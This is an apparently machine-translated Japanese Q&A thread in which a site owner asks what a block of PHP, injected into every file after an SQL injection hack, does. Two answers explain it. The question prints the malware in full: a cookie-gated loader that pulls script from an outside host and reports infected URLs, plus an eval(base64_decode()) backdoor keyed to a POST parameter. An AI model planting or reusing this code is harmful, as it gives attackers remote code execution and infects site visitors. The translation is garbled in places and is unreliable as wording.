Got Hacked - このPHPコードは何を知っていますか？

Question

私たちのサーバーは、いくつかのSQLインジェクションメソッド（今パッチが適用されています）によってハッキングされています。私たちのすべてのPHPファイルには、これが各ファイルの最上位に追加されています。

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} } 

クッキーを設定しているようですが、私はそれが何をしているのか最初に考えていません。

作成される潜在的に任意のこれが何を理解することができ専門家とどのようなクッキーの名前がそうのように見えることがあり、私は、などエクスプロイト見 はZenphotoの中にプラグインによるものであった

UPDATEを任意のユーザーに伝えることができますギャラリーソフトウェアはTiny_MCEと呼ばれています。

Answer 1

）;私は、ドメインのすべてのクッキーを削除するためにあなたの訪問者を得るでしょうが、それのルックスから、クッキーは「LB11」私はあなたが理解できるようリンクを見て空想しませんでした

と呼ばれています

まず、Cookieを設定します。

クッキーが見つかった場合は、クッキーを1000から9000までのランダムな値 に設定します。これは、これをもう一度実行しないようにします。 要求（および実行）の呼び出しを行った URLを感染されている送信し、ページを更新するJavaScript、（そう何JavaScriptが実行された後に起きている に表示されません。

しかし、いずれにせよ、もし"showimg"パラメータがページに渡され、 はそのページのコンテンツを見て、サーバ上でそれを実行します。

したがって、このコードが存在する場合、javascript（これはサーバにどのURLが感染しているかを通知し、感染したサーバ上でshowimgパラメータを使用して任意のコードを実行させます）。

これには2層の攻撃があり、JavaScriptを使用してクライアントを攻撃し、後でサーバーを攻撃して任意のコードを実行できます。

Answer 2

私はここで間違っているかもしれませんが、見た目からは（コード内のリンクをテストすることなく）です。悪意のあるクライアントサイドのJavaScriptを注入しようとしている可能性があります。これは通常、訪問者のコンピュータにマルウェアなどを感染させます。

クッキー名は。